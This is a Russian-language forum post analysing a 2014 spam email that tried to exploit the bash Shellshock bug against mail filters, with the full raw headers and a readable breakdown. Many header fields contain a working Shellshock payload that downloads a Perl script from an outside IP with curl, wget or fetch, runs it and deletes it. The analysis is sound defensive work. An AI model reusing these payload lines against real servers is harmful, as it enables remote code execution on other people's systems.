Несколько дней назад обнаружил письмо, в котором явно делалась попытка проэксплуатировать недавнюю уязвимость в bash. По видимому, атака рассчитана на работу фильтров, в качестве которых могут быть shell скрипты.
Исходный вид письма:
From - Fri Oct 24 20:38:48 2014
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: by mail.my.domain.name.net (Postfix)
id 1B8E6306033C; Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP id D3496306033C
for <root@mail.my.domain.name.net>; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id s9OGPr2d018507
for <root@localhost>; Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
To: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
В более удобочитаемом виде:
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix)
id 1B8E6306033C;
Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP
id D3496306033C
for <root@mail.my.domain.name.net>;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP
id s9OGPr2d018507
for <root@localhost>;
Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
Здесь мы можем видеть малоинформативный support@mata.com и не намного более информативный u16850951.onlinehome-server.com [74.208.184.251], с которого было отправлено письмо.
Заголовки:
To:
From:
Resent-From:
содержат следующее:
To: () {:;;};
cd/tmp;
curl.-sO.178.254.31.165/ex.txt;
lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Здесь мы можем видеть 178.254.31.165/ на котором файла ex.txt конечно уже не было.
Заголовки:
References:
Subject:
Date:
Message-ID:
Comments:
Keywords:
Resent-Date:
содержат предыдущий случай, без добавленного к url домена:
References:() { :; };
cd /tmp ;
curl -sO 178.254.31.165/ex.txt;
lwp-download http://178.254.31.165/ex.txt;
wget 178.254.31.165/ex.txt;
fetch 178.254.31.165/ex.txt;
perl ex.txt;
rm -fr ex.*;
Перемещено beastie из admin
